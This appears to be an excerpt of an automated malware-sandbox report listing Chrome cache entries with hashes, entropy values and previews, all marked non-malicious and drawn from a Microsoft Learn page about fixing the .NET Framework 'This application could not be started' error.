                                                                                                                                                                                            Preview:// ES5 script for back compat with unsupported browsers..!(function () {..'use strict';..// Keep in sync with environment/browser.ts..var supportedBrowser =...typeof Blob === 'function' &&...typeof PerformanceObserver === 'function' &&...typeof Intl === 'object' &&...typeof MutationObserver === 'function' &&...typeof URLSearchParams === 'function' &&...typeof WebSocket === 'function' &&...typeof IntersectionObserver === 'function' &&...typeof queueMicrotask === 'function' &&...typeof TextEncoder === 'function' &&...typeof TextDecoder === 'function' &&...typeof customElements === 'object' &&...typeof HTMLDetailsElement === 'function' &&...typeof AbortController === 'function' &&...typeof AbortSignal === 'function' &&...'entries' in FormData.prototype &&...'toggleAttribute' in Element.prototype &&...'replaceChildren' in Element.prototype &&...// ES2019...'fromEntries' in Object &&...'flatMap' in Array.prototype &&...'trimEnd' in String.prototype &&...// ES2020...'allSettled' in Promise &

                                                                                                                                                                                            Chrome Cache Entry: 279

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):18367
                                                                                                                                                                                            Entropy (8bit):7.7772261735974215
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:4qqZYz7CAda2Qmd6VWWNg9h8XvdkRbdi2nki:1qZYz7Cma2hYNMh8XvdObdi2nX
                                                                                                                                                                                            MD5:240C4CC15D9FD65405BB642AB81BE615
                                                                                                                                                                                            SHA1:5A66783FE5DD932082F40811AE0769526874BFD3
                                                                                                                                                                                            SHA-256:030272CE6BA1BECA700EC83FDED9DBDC89296FBDE0633A7F5943EF5831876C07
                                                                                                                                                                                            SHA-512:267FE31BC25944DD7B6071C2C2C271CCC188AE1F6A0D7E587DCF9198B81598DA6B058D1B413F228DF0CB37C8304329E808089388359651E81B5F3DEC566D0EE0
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-no-resolution.png
                                                                                                                                                                                            Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..GTIDATx^._.}.U.7..BkB.......!E......b.Ej.K...Z...iK.$..h..B`..T.?5.7.I..16$.E.......c...c...Q_V.k...k..g.y.9..G.g..g.9.Z{..Z{.nv....@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...<@v.].../.1R'm.....x..h.....]a1U7........s.......x.h.q.A! *....8IL\GP..............M...W.............D.....dJ<.+,.........W...pgAT...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.;/*..G....O~..O~...'?......h.....}.y..4/....S..........Y......?..?.g7...G...............x{..w..y.~.9.~.y....y.#.c....<.E.............^..7G.._.u.nv/..f........5.....5?.;...w.....i~.?|..H+*Dd.....Y%*....r~.$Q...7.v..._hv..r.O_.4..7M.6....o..=..?....3....?.....xE...O..7....^......D.W....m...6........O..Ob.4.9J........6.;..>.,.....o.l..>%J.V......%k..0.bQqIA..O..y.{.....7.......4_..Za...4.o.....h..........k...M...i....G.4...h.L.#...&.'%...~j..W.*Kx......o.%s.m

                                                                                                                                                                                            Chrome Cache Entry: 280

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):1154
                                                                                                                                                                                            Entropy (8bit):4.59126408969148
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:txFRuJpzYeGK+VS6ckNL2091JP/UcHc8oQJ1sUWMLc/jH6GbKqjHJIOHA:JsfcU6ckNL2091Z/U/YsUDM+GhS
                                                                                                                                                                                            MD5:37258A983459AE1C2E4F1E551665F388
                                                                                                                                                                                            SHA1:603A4E9115E613CC827206CF792C62AEB606C941
                                                                                                                                                                                            SHA-256:8E34F3807B4BF495D8954E7229681DA8D0DD101DD6DDC2AD7F90CD2983802B44
                                                                                                                                                                                            SHA-512:184CB63EF510143B0AF013F506411C917D68BB63F2CFA47EA2A42688FD4F55F3B820AF94F87083C24F48AACEE6A692199E185FC5C5CFBED5D70790454EED7F5C
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:<svg width="456" height="456" viewBox="0 0 456 456" fill="none" xmlns="http://www.w3.org/2000/svg">..<rect width="456" height="456" fill="#512BD4"/>..<path d="M81.2738 291.333C78.0496 291.333 75.309 290.259 73.052 288.11C70.795 285.906 69.6665 283.289 69.6665 280.259C69.6665 277.173 70.795 274.529 73.052 272.325C75.309 270.121 78.0496 269.019 81.2738 269.019C84.5518 269.019 87.3193 270.121 89.5763 272.325C91.887 274.529 93.0424 277.173 93.0424 280.259C93.0424 283.289 91.887 285.906 89.5763 288.11C87.3193 290.259 84.5518 291.333 81.2738 291.333Z" fill="white"/>..<path d="M210.167 289.515H189.209L133.994 202.406C132.597 200.202 131.441 197.915 130.528 195.546H130.044C130.474 198.081 130.689 203.508 130.689 211.827V289.515H112.149V171H134.477L187.839 256.043C190.096 259.57 191.547 261.994 192.192 263.316H192.514C191.977 260.176 191.708 254.859 191.708 247.365V171H210.167V289.515Z" fill="white"/>..<path d="M300.449 289.515H235.561V171H297.87V187.695H254.746V221.249H294.485V237.861H254.746V

                                                                                                                                                                                            Chrome Cache Entry: 281

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):3130
                                                                                                                                                                                            Entropy (8bit):4.790069981348324
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:YWuGl640ynAqgDJ9OJWuO6Z3Db8VgK/ni47ttbtlSlA37ERw7II77Aj5M1:Nv0ynAhD3CO5t5lNEYIOEjc
                                                                                                                                                                                            MD5:EBA6E81304F2F555E1D2EA3126A18A41
                                                                                                                                                                                            SHA1:61429C3FE837FD4DD68E7B26678F131F2E00070D
                                                                                                                                                                                            SHA-256:F309CCCE17B2B4706E7110F6C76F81761F0A44168D12C358AC4D120776907F81
                                                                                                                                                                                            SHA-512:3BE0466794E7BDDC8565758DBF5553E89ED0003271F07695F09283F242BB65C1978ED79A38D5E589A99F68C0130E1E4B52576D7CD655EE272EE104BE0378E72E
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:{"items":[{"children":[{"children":[{"homepage":"/dotnet/api/index","href":"/dotnet/api/","toc_title":"API browser"},{"homepage":"/dotnet/csharp/index","href":"/dotnet/csharp/","toc_title":"C#"},{"homepage":"/dotnet/fsharp/index","href":"/dotnet/fsharp/","toc_title":"F#"},{"homepage":"/dotnet/visual-basic/index","href":"/dotnet/visual-basic/","toc_title":"Visual Basic"},{"homepage":"/dotnet/ai/index","href":"/dotnet/ai/","toc_title":"AI"},{"homepage":"/dotnet/azure/index","href":"/dotnet/azure/","toc_title":"Azure"},{"homepage":"/dotnet/aspire/index","href":"/dotnet/aspire/","toc_title":".NET Aspire"},{"homepage":"/dotnet/orleans/index","href":"/dotnet/orleans/","toc_title":"Orleans"},{"children":[{"homepage":"/dotnet/framework/unmanaged-api/","href":"/dotnet/framework/unmanaged-api/","toc_title":"Unmanaged API reference"}],"homepage":"/dotnet/framework/index","href":"/dotnet/framework/","toc_title":".NET Framework"},{"children":[{"homepage":"/dotnet/architecture/modern-web-apps-azure/

                                                                                                                                                                                            Chrome Cache Entry: 282

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):15427
                                                                                                                                                                                            Entropy (8bit):7.784472070227724
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:CKKdvwj3SJMpKKKKKKKKikCyKwqHILyPGQV4ykihKKKKKKKCm:CKKdvMMgKKKKKKKKiqB3yPVXkihKKKKI
                                                                                                                                                                                            MD5:3062488F9D119C0D79448BE06ED140D8
                                                                                                                                                                                            SHA1:8A148951C894FC9E968D3E46589A2E978267650E
                                                                                                                                                                                            SHA-256:C47A383DE6DD60149B37DD24825D42D83CB48BE0ED094E3FC3B228D0A7BB9332
                                                                                                                                                                                            SHA-512:00BBA6BCBFBF44B977129594A47F732809DCE7D4E2D22D050338E4EEA91FCC02A9B333C45EEB4C9024DF076CBDA0B46B621BF48309C0D037D19BBEAE0367F5ED
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..;.IDATx^..].u.Y..M....B.X...".......@.ZzSys..,H{.Rz!... .......WM.IN..9n..I....g...p<P.0*-....|...X..s...Z.Y{....w..5.._s..x...E.......... ......*............... ......*............{....2. ...`.$h.......)....,T-x.5......,.."..(.A.......>.. ...`..*....4..G.|.....,T-..'. ...`....]........?~.....A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.}P../}....TJ...'.O...'?......XH...K..>.b..K/t...o.......T.._.E.....q.$.x..qJ......mo...ww.}.{....W..._...._.^z...........(^x..C..P.../.........U..]../u.....w..{.O.N..o.l........_.^...2.....*....<...iP.W...o......]..+.?}c...t!.....p.=..._x..._yo....?....~u.c?.c1'.....{.^.}.S...5.yMx./.>.lwqq.}.....g..g1wZ..%......h.i[..%ul.&..U.k..";7-.9.6...s..s..0.......}.s..?...c..X...|..........>.x..o.?.?..{........n..o....]?....Ej..yuu5...A.}....5...^...f........s.qJ..SYF.V...'..q.......T..'..z.....

                                                                                                                                                                                            Chrome Cache Entry: 283

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines (639), with CRLF, LF line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):47062
                                                                                                                                                                                            Entropy (8bit):5.016149588804727
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:768:haAq16LIElO6L6x2bTI1ln4a1T0MCFnFMBVeZrdLg:hTKGLlO6eAbTIr4audZqBkZRLg
                                                                                                                                                                                            MD5:1FF4CE3C1DB69A5146B03AD8BE62F5EB
                                                                                                                                                                                            SHA1:5D177F6D11FCFF2BD62E61983383BB39D9F045E4
                                                                                                                                                                                            SHA-256:222F320F99EF710DCE98F125314F30DAC99CF408525D86F185B317A878D48A5C
                                                                                                                                                                                            SHA-512:36D198120D83AA9BDC2E74F80B99E2219EE4F03A8DD93A1E58A9E30BD48E829E5220A9F5FE6FC29B3810ED85005A8DCD0EAD04EE06DCCD0A15CD6D080E88641D
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            URL:https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                            Preview:<!DOCTYPE html><html..class="hasSidebar hasPageActions hasBreadcrumb conceptual has-default-focus theme-light"..lang="en-us"..dir="ltr"..data-authenticated="false"..data-auth-status-determined="false"..data-target="docs"..x-ms-format-detection="none">..<head>..<meta charset="utf-8" />..<meta name="viewport" content="width=device-width, initial-scale=1.0" />..<meta property="og:title" content="Fix .NET Framework 'This application could not be started' - .NET Framework" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started" /><meta property="og:description" content="Learn what to do if you see a 'This application could not be started' dialog box when running a .NET Framework application." /><meta property="og:image" content="https://learn.microsoft.com/dotnet/media/dotnet-logo.png" />...<meta property="og:image:alt" content="Fix .NET Framework 'This application could not be st

                                                                                                                                                                                            Chrome Cache Entry: 284

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):16
                                                                                                                                                                                            Entropy (8bit):3.875
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:HMB:k
                                                                                                                                                                                            MD5:0B04EA412F8FC88B51398B1CBF38110E
                                                                                                                                                                                            SHA1:E073BCC5A03E7BBA2A16CF201A3CED1BE7533FBF
                                                                                                                                                                                            SHA-256:7562254FF78FD854F0A8808E75A406F5C6058B57B71514481DAE490FC7B8F4C3
                                                                                                                                                                                            SHA-512:6D516068C3F3CBFC1500032E600BFF5542EE30C0EAC11A929EE002C707810BBF614A5586C2673EE959AFDF19C08F6EAEFA18193AD6CEDC839BDF249CF95E8079
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAkEurwx6c-nJBIFDb_mJfI=?alt=proto
                                                                                                                                                                                            Preview:CgkKBw2/5iXyGgA=

                                                                                                                                                                                            Chrome Cache Entry: 285

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (65410)
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):207935
                                                                                                                                                                                            Entropy (8bit):5.420780972514107
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3072:Wx2fZBMb0y0Xi13tL9+pjXDMe/m7GG3/lHNVliMTqwK:Wof3G0NSkNzMeO7z/l3lhTa
                                                                                                                                                                                            MD5:3DE400B2682E30C3F33FA4B93116491F
                                                                                                                                                                                            SHA1:BC48B898DF43BA2178DE28F5A29D977B2204F846
                                                                                                                                                                                            SHA-256:84E9EAD32EFA16BE0D5B2407F799FC3DAE497BCB4A90758C0106C8D8F55003FE
                                                                                                                                                                                            SHA-512:D4004E4A62A81116D346B7A7F95FC67F97A258E82B3BDDBF4A9F28CEBB633E4A336A17057A765DA306AD9B1E40A99FE349D698B095A6F386B9CDF4A46457FC06
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:/*!. * 1DS JSLL SKU, 4.3.3. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&define.amd)define(["exports"],t);else{var r,i,e=typeof globalThis!=n?globalThis:e||self,a={},o="__ms$mod__",c={},u=c.es5_ms_jsll_4_3_3={},s="4.3.3",l="oneDS4",f=(f=e)[l]=f[l]||{},d=(d=e)[l="oneDS"]=d[l]||{},e=f[o]=f[o]||{},p=e.v=e.v||[],l=d[o]=d[o]||{},g=l.v=l.v||[];for(i in(l.o=l.o||[]).push(c),t(a),a)r="x",f[i]=a[i],p[i]=s,typeof d[i]==n?(r="n",(d[i]=a[i])&&(g[i]=s)):g[i]||(g[i]="---"),(u[r]=u[r]||[]).push(i)}}(this,function(f){"use strict";var d="function",p="object",se="undefined",ie="prototype",g=Object,h=g[ie];function y(e,t){return e||t}var C,Ce=undefined,m=null,b="",T="function",I="object",E="prototype",_="__proto__",S="undefined",x="constructor",N="Symbol",D="_polyfill",A="length",w="name",be="call",k="toString",P=y(Object),O=P[E]

                                                                                                                                                                                            Chrome Cache Entry: 286

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):27868
                                                                                                                                                                                            Entropy (8bit):5.155680085584642
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:768:63ZUfTvLg6jLjnjrjGjXMQjtzjMFzXY8v1gWj/rlOVqnACpK3o3hhl0OU2/8BlsX:BTvL7HBJv11pOVqlh382/rIN1Y
                                                                                                                                                                                            MD5:0A0F2E1CCB8E5F7C38CB11B101A8941F
                                                                                                                                                                                            SHA1:112F4B7CB3DEDB9D9744CAC000E05DC949E89891
                                                                                                                                                                                            SHA-256:DBDB03D01BA044C4072BBC169C1E54D05A3D89623D2EBEAC28AC89ABDA3ABC2A
                                                                                                                                                                                            SHA-512:9BD4E9C2415FB62E55D04DDEB9ECE04CB9AE2B8F8B93632A11A0AFD1CE6A632DF7D58DD571BF34C6E8E99107E80340CFAFF4BB4A8E18D05B5CAA7445DE55839C
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:{"banners":[{"content":{"text":"You may experience reduced functionality with empty pages and broken links. Development is in progress to improve your experience."},"dismissable":false,"location":"sectional","scope":{"accessLevels":["isolated"],"endDate":"2030-01-01T00:00:00-00:00","paths":["/samples/browse/","/lifecycle/products/","/dotnet/api/","/javascript/api/","/java/api/","/powershell/module/","/python/api/","/rest/api/","/assessments/"],"startDate":"2020-10-01T05:00:00-04:00"},"uid":"development-in-progress-isolated"},{"content":{"link":{"href":"/en-us/answers/questions/1657059/the-subscription-is-not-allowed-to-create-or-updat","title":"View discussion"},"text":"App Service deployment: subscription \u0027xxxxxxxx\u0027 is not allowed to create or update the server farm."},"dismissable":true,"location":"sectional","scope":{"accessLevels":["online"],"endDate":"2024-05-24T07:34:00.000Z","paths":["/answers/tags/436/azure-app-service"],"startDate":"2024-04-22T07:34:00.000Z"},"uid":"

                                                                                                                                                                                            Chrome Cache Entry: 287

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (65410)
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):207935
                                                                                                                                                                                            Entropy (8bit):5.420780972514107
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3072:Wx2fZBMb0y0Xi13tL9+pjXDMe/m7GG3/lHNVliMTqwK:Wof3G0NSkNzMeO7z/l3lhTa
                                                                                                                                                                                            MD5:3DE400B2682E30C3F33FA4B93116491F
                                                                                                                                                                                            SHA1:BC48B898DF43BA2178DE28F5A29D977B2204F846
                                                                                                                                                                                            SHA-256:84E9EAD32EFA16BE0D5B2407F799FC3DAE497BCB4A90758C0106C8D8F55003FE
                                                                                                                                                                                            SHA-512:D4004E4A62A81116D346B7A7F95FC67F97A258E82B3BDDBF4A9F28CEBB633E4A336A17057A765DA306AD9B1E40A99FE349D698B095A6F386B9CDF4A46457FC06
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            URL:https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js
                                                                                                                                                                                            Preview:/*!. * 1DS JSLL SKU, 4.3.3. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&define.amd)define(["exports"],t);else{var r,i,e=typeof globalThis!=n?globalThis:e||self,a={},o="__ms$mod__",c={},u=c.es5_ms_jsll_4_3_3={},s="4.3.3",l="oneDS4",f=(f=e)[l]=f[l]||{},d=(d=e)[l="oneDS"]=d[l]||{},e=f[o]=f[o]||{},p=e.v=e.v||[],l=d[o]=d[o]||{},g=l.v=l.v||[];for(i in(l.o=l.o||[]).push(c),t(a),a)r="x",f[i]=a[i],p[i]=s,typeof d[i]==n?(r="n",(d[i]=a[i])&&(g[i]=s)):g[i]||(g[i]="---"),(u[r]=u[r]||[]).push(i)}}(this,function(f){"use strict";var d="function",p="object",se="undefined",ie="prototype",g=Object,h=g[ie];function y(e,t){return e||t}var C,Ce=undefined,m=null,b="",T="function",I="object",E="prototype",_="__proto__",S="undefined",x="constructor",N="Symbol",D="_polyfill",A="length",w="name",be="call",k="toString",P=y(Object),O=P[E]

                                                                                                                                                                                            Chrome Cache Entry: 288

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):27868
                                                                                                                                                                                            Entropy (8bit):5.155680085584642
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:768:63ZUfTvLg6jLjnjrjGjXMQjtzjMFzXY8v1gWj/rlOVqnACpK3o3hhl0OU2/8BlsX:BTvL7HBJv11pOVqlh382/rIN1Y
                                                                                                                                                                                            MD5:0A0F2E1CCB8E5F7C38CB11B101A8941F
                                                                                                                                                                                            SHA1:112F4B7CB3DEDB9D9744CAC000E05DC949E89891
                                                                                                                                                                                            SHA-256:DBDB03D01BA044C4072BBC169C1E54D05A3D89623D2EBEAC28AC89ABDA3ABC2A
                                                                                                                                                                                            SHA-512:9BD4E9C2415FB62E55D04DDEB9ECE04CB9AE2B8F8B93632A11A0AFD1CE6A632DF7D58DD571BF34C6E8E99107E80340CFAFF4BB4A8E18D05B5CAA7445DE55839C
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            URL:https://learn.microsoft.com/en-us/banners/index.json
                                                                                                                                                                                            Preview:{"banners":[{"content":{"text":"You may experience reduced functionality with empty pages and broken links. Development is in progress to improve your experience."},"dismissable":false,"location":"sectional","scope":{"accessLevels":["isolated"],"endDate":"2030-01-01T00:00:00-00:00","paths":["/samples/browse/","/lifecycle/products/","/dotnet/api/","/javascript/api/","/java/api/","/powershell/module/","/python/api/","/rest/api/","/assessments/"],"startDate":"2020-10-01T05:00:00-04:00"},"uid":"development-in-progress-isolated"},{"content":{"link":{"href":"/en-us/answers/questions/1657059/the-subscription-is-not-allowed-to-create-or-updat","title":"View discussion"},"text":"App Service deployment: subscription \u0027xxxxxxxx\u0027 is not allowed to create or update the server farm."},"dismissable":true,"location":"sectional","scope":{"accessLevels":["online"],"endDate":"2024-05-24T07:34:00.000Z","paths":["/answers/tags/436/azure-app-service"],"startDate":"2024-04-22T07:34:00.000Z"},"uid":"

                                                                                                                                                                                            Chrome Cache Entry: 289

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):15427
                                                                                                                                                                                            Entropy (8bit):7.784472070227724
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:CKKdvwj3SJMpKKKKKKKKikCyKwqHILyPGQV4ykihKKKKKKKCm:CKKdvMMgKKKKKKKKiqB3yPVXkihKKKKI
                                                                                                                                                                                            MD5:3062488F9D119C0D79448BE06ED140D8
                                                                                                                                                                                            SHA1:8A148951C894FC9E968D3E46589A2E978267650E
                                                                                                                                                                                            SHA-256:C47A383DE6DD60149B37DD24825D42D83CB48BE0ED094E3FC3B228D0A7BB9332
                                                                                                                                                                                            SHA-512:00BBA6BCBFBF44B977129594A47F732809DCE7D4E2D22D050338E4EEA91FCC02A9B333C45EEB4C9024DF076CBDA0B46B621BF48309C0D037D19BBEAE0367F5ED
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-recommended-changes.png
                                                                                                                                                                                            Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..;.IDATx^..].u.Y..M....B.X...".......@.ZzSys..,H{.Rz!... .......WM.IN..9n..I....g...p<P.0*-....|...X..s...Z.Y{....w..5.._s..x...E.......... ......*............... ......*............{....2. ...`.$h.......)....,T-x.5......,.."..(.A.......>.. ...`..*....4..G.|.....,T-..'. ...`....]........?~.....A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.}P../}....TJ...'.O...'?......XH...K..>.b..K/t...o.......T.._.E.....q.$.x..qJ......mo...ww.}.{....W..._...._.^z...........(^x..C..P.../.........U..]../u.....w..{.O.N..o.l........_.^...2.....*....<...iP.W...o......]..+.?}c...t!.....p.=..._x..._yo....?....~u.c?.c1'.....{.^.}.S...5.yMx./.>.lwqq.}.....g..g1wZ..%......h.i[..%ul.&..U.k..";7-.9.6...s..s..0.......}.s..?...c..X...|..........>.x..o.?.?..{........n..o....]?....Ej..yuu5...A.}....5...^...f........s.qJ..SYF.V...'..q.......T..'..z.....

                                                                                                                                                                                            Chrome Cache Entry: 290

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):1432
                                                                                                                                                                                            Entropy (8bit):4.986131881931089
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:TGAcSRrEV4YUmjiqIWD5bfD9yRSmkYR/stZLKvVqXRRlAfr6VXBAuU:Ti4IV4YUmjiqr9bfskAmZTXGfSXqh
                                                                                                                                                                                            MD5:6B8763B76F400DC480450FD69072F215
                                                                                                                                                                                            SHA1:6932907906AFCF8EAFA22154D8478106521BC9EE
                                                                                                                                                                                            SHA-256:3FB84D357F0C9A66100570EDD62A04D0574C45E8A5209A3E6870FF22AF839DFC
                                                                                                                                                                                            SHA-512:8A07EBB806A0BA8EF54B463BD6AF37C77A10C1FA38A57128FD90FCB2C16DF71CE697D4FE65C623E5C6054C5715975831C36861D5574F59DF28836D9BC2B0BC22
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            URL:https://learn.microsoft.com/static/assets/0.4.029026183/global/deprecation.js
                                                                                                                                                                                            Preview:// ES5 script for back compat with unsupported browsers..!(function () {..'use strict';..// Keep in sync with environment/browser.ts..var supportedBrowser =...typeof Blob === 'function' &&...typeof PerformanceObserver === 'function' &&...typeof Intl === 'object' &&...typeof MutationObserver === 'function' &&...typeof URLSearchParams === 'function' &&...typeof WebSocket === 'function' &&...typeof IntersectionObserver === 'function' &&...typeof queueMicrotask === 'function' &&...typeof TextEncoder === 'function' &&...typeof TextDecoder === 'function' &&...typeof customElements === 'object' &&...typeof HTMLDetailsElement === 'function' &&...typeof AbortController === 'function' &&...typeof AbortSignal === 'function' &&...'entries' in FormData.prototype &&...'toggleAttribute' in Element.prototype &&...'replaceChildren' in Element.prototype &&...// ES2019...'fromEntries' in Object &&...'flatMap' in Array.prototype &&...'trimEnd' in String.prototype &&...// ES2020...'allSettled' in Promise &

                                                                                                                                                                                            Chrome Cache Entry: 291

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):464328
                                                                                                                                                                                            Entropy (8bit):5.0747157240281755
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:XegPrbKCerH5dyUJ6Yh6BFPDxZYX04GK7M4:1KCerXyUh
                                                                                                                                                                                            MD5:875E7F3672FEC41DDB5A2386D2331531
                                                                                                                                                                                            SHA1:282979933E99BDE3A6342DC1EF93FBC51682F2C3
                                                                                                                                                                                            SHA-256:F205B3CBA340ECB0B5D45E5DE6D385947CC4C21248707A90BFD5894E9B61F3C9
                                                                                                                                                                                            SHA-512:67A3C1D8FF089E01C20962D96968DE43F3E8D49B474C396F08827EE891C0315693634E663D3148D7441B501EA6939A7D84A80B1E855B7C2A8BCB17E0013AFAD4
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            URL:https://learn.microsoft.com/static/assets/0.4.029026183/styles/site-ltr.css
                                                                                                                                                                                            Preview:.CodeMirror{height:300px;color:#000;direction:ltr;font-family:monospace}.CodeMirror-lines{padding:4px 0}.CodeMirror pre.CodeMirror-line,.CodeMirror pre.CodeMirror-line-like{padding:0 4px}.CodeMirror-scrollbar-filler,.CodeMirror-gutter-filler{background-color:#fff}.CodeMirror-gutters{white-space:nowrap;background-color:#f7f7f7;border-right:1px solid #ddd}.CodeMirror-linenumber{min-width:20px;text-align:right;color:#999;white-space:nowrap;padding:0 3px 0 5px}.CodeMirror-guttermarker{color:#000}.CodeMirror-guttermarker-subtle{color:#999}.CodeMirror-cursor{width:0;border-left:1px solid #000;border-right:none}.CodeMirror div.CodeMirror-secondarycursor{border-left:1px solid silver}.cm-fat-cursor .CodeMirror-cursor{width:auto;background:#7e7;border:0!important}.cm-fat-cursor div.CodeMirror-cursors{z-index:1}.cm-fat-cursor .CodeMirror-line::selection,.cm-fat-cursor .CodeMirror-line>span::selection,.cm-fat-cursor .CodeMirror-line>span>span::selection{background:0 0}.cm-fat-cursor{caret-color:#0

                                                                                                                                                                                            Chrome Cache Entry: 292

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (52717), with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):52717
                                                                                                                                                                                            Entropy (8bit):5.462668685745912
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:1536:tjspYRrxlhd0fq3agV3IcgPPPI3r7DAQHCloIB3Tj7xHw:tjZLCtxQ
                                                                                                                                                                                            MD5:413FCC759CC19821B61B6941808B29B5
                                                                                                                                                                                            SHA1:1AD23B8A202043539C20681B1B3E9F3BC5D55133
                                                                                                                                                                                            SHA-256:DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
